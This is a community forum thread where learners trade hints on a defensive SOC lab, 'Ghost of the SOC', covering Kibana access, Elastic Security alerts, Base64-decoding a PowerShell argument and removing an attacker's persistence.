Hi there,Am I right as obvious that it may seem that for me to login to Kibana, I need to access this through the Elastic IP address that I have entered in my browser? If so I'm getting the error message on my screenshot. I tried this a few days ago as well and the problem persisted then as well.

If I remember correctly you need to add 5601, the port in the url and should work.

Here I'd suggest exploring the Security area instead of Observability

Its tricky. The svc account password is stored plain text in a file somewhere.Try look for something on the machine which looks a little out of place, then go deeper.

Ah, that was easy, thx!Now I've got the password, and I can e.g. use it to disable that account, but it doesn't seem to be enough to remove the persistence :-(Edit: Never mind, I found another thread here discussing the same lab with the right hint to proceed!

For question 1, I can see an active alert but it appears I'm not able to view it? I also played about with the option for Group alerts by: ...... - yet to no avail? Am I doing something incorrectly?

Trick or Treat on Specter Street: Ghost of the SOC

11 Replies

S1m0n07
Bronze I
16 days ago
If I remember correctly you need to add 5601, the port in the url and should work.
Dark_Knight666
Bronze III
16 days ago
For question 1, I can see an active alert but it appears I'm not able to view it? I also played about with the option for Group alerts by: ...... - yet to no avail? Am I doing something incorrectly?
- Samh051
  Bronze II
  15 days ago
  Your set to last 24 hours, try changing the time range and you should see something.
  - Dark_Knight666
    Bronze III
    15 days ago
    So I've moved it from Sep 15 as specified on the briefing panel to Sep 16, but still no results?
ThreatWhisperer
Bronze II
15 days ago
I succeeded in practically all steps except the last one.
I found the ghost's first communication, the human account, the scripts folder, and the service account.
I can connect with the human account (for which I know the password), but I don't know how to use the service account, for which I don't have the credentials, so I can't do much.
I found a simple way to avoid the annoying messages using the human account, but I can't really eliminate the presence.
Did I miss something?
Any good advice?
- Samh051
  Bronze II
  15 days ago
  Its tricky. The svc account password is stored plain text in a file somewhere.
  Try look for something on the machine which looks a little out of place, then go deeper.
  - ThreatWhisperer
    Bronze II
    15 days ago
    Ah, that was easy, thx!
    Now I've got the password, and I can e.g. use it to disable that account, but it doesn't seem to be enough to remove the persistence :-(
    Edit: Never mind, I found another thread here discussing the same lab with the right hint to proceed!
Dark_Knight666
Bronze III
15 days ago
Still a little stuck on Q1 🤯
So looking through the Powershell command line, I understand that the script is Base64 string, and found what I think may be the Ghosts communication, but when I pass this through using CyberChef it appears not to be correct. So I am decoding it from Base64. Am I completely off the mark here?
- Samh051
  Bronze II
  14 days ago
  Expand the alert instead of clicking on the rule name.
  Use this button -
  You should then be able to see the base64 encoded argument.
Dark_Knight666
Bronze III
9 days ago
Oh dear! I have expanded the alert but still can't find the base64 encoded argument (Am I really that blind, I wonder?)